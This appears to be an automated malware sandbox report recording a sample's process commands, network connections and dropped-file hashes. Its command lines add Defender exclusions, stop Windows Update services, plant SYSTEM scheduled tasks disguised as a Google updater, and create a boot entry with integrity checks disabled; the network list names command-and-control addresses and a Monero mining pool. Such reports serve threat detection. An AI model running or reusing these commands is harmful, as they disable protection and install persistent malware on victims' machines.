"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nBRnpywzcTvqknVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\wUBDPVxDQVpvNZiy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 05:10:36 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\PIpAHdz.exe\" KS /xAsite_idJGH 385119 /S" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\PIpAHdz.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\PIpAHdz.exe KS /xAsite_idJGH 385119 /S

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\wraIvY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Network

Country Destination Domain Proto
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
BG 171.22.28.239:42359 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
FI 77.91.124.71:4341 tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-file-host6.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
NL 194.169.175.235:42691 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 d3128977-dcce-4891-89ba-7f4709291041.uuid.dumppage.org udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
DE 148.251.234.93:443 iplogger.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp

Files

memory/1576-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1576-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1576-4-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1576-5-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1576-6-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1380-7-0x00000000026D0000-0x00000000026E6000-memory.dmp

memory/1576-8-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EC81.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\EC81.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\ED7B.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

\Users\Admin\AppData\Local\Temp\EC81.exe

MD5 01161c1325b36d158a54f7fa440694d9
SHA1 9a1a26689f96cb69dda63f4a78d0d57139e2216d
SHA256 b74ca29c3e1d156cfaf092f9398d0f75b8de65b9425a128e6ee9735679ec5a2a
SHA512 7aede95c129c92a9f84719b7815e9bedf0f11f70e0416d05926fa2f18e23b0677a23246ff594dae117be79ffa702a80806a50dbe57d6b3261a6cad71328e7b8b

C:\Users\Admin\AppData\Local\Temp\EED4.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\EED4.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

MD5 0fb75453e9d1ee53b30138070665c9a5
SHA1 db681d18e0acf63796a638ad33dd4eec73bfe5d6
SHA256 7a096fa97a25b6427a27be1db721566daa03096e9eb2b743a43563638461a00c
SHA512 c7f996c83296a085158a20b4dafd95b71f081d2b39ce5d000db4e79dcc5c733f816b394e83c42dc1a6dc01b6553662c8ab58d0493b170496e1d32fdc0a7503b3

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\F00D.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\F00D.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

MD5 1c0f188479125e6b65f25b100348f336
SHA1 305f64656f03fb58f872b0639c9605e8f11433be
SHA256 f32a8dd3633ec70c80e3ba2c1093fd1ce2ffef45803456688010f76464a84b16
SHA512 1a6ab8c8a6262f03e5c2d68df719fc609644182e7924124627ce70dcd078d1f6ae23db6f3675159e07e09ab77b81f488b37d7eab2893b3716f5db45da65b2600

C:\Users\Admin\AppData\Local\Temp\F136.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\F136.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Ar7rg98.exe

MD5 10e5dd5ec2a3592b3f5487c7919f35ad
SHA1 52a52ad728f6b61946543632dbae8c2d84c0ebbc
SHA256 69a4aaf260c5ef143f7ec3df81155921777dbbd64dedd2b8ede553992766a3d7
SHA512 66974a4159192f4739b14f0cc07c3c38060f93156de5a07d3c6e856abc7b640d1fc6519fdb7d7094a28200ed6ebeb6d2df1004d9f8674da54924ad0b1e11a8db

\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

MD5 59dae5fe6ffa1a540dd6afc7f438115c
SHA1 f6eba4e7b7c3d815e1d5bc02226ed33adb16ae07
SHA256 026954d379163858506b4e84e8e04d951beedb8514ef127e4f64b46a10b67784
SHA512 c04877b6c5dc04615c7d251d960d7d145a7e859e2c987b6c736207bd3110a319e42f2555c80d1a524d0c470d14060acaa8538fa764ec50e86544771324641170

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

MD5 8f9ec68001fe8c9872a4d345f1038913
SHA1 db3a4408ab60f3155531b5588c76c810d054aa1e
SHA256 ee92a49d65e8b5f367a18d0d864f90790676ce038321ba6d54475f41c71c7e9d
SHA512 fb0fbe58a3c7e1d2deb91a604afe97fa68d8a2fdf854b04e827447436909f0a71e5c5e3ec44cf0c54717a64bdaa608e87ec19d4c36bfd2fa054b29b1e81d399c

\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

MD5 46ac23136148f718bf54755d61bcd211
SHA1 2ba02fdc8cbd3897d8b9a0dcefba1cfbbbeed74d
SHA256 e9350f2b260426ef7dceb2fca98327b9679834ea011378eea1d6be420370d34c
SHA512 84f0e547c297a7a659e5e558a605495a0873f783878e56fe926b35ee055b509e71783954d8ccbe2a53b45a20b3f894622f932c3104c543f00f9714a9cff8ad3f

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/796-104-0x0000000000C20000-0x0000000000C2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/2440-105-0x0000000001050000-0x000000000108E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F2DC.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
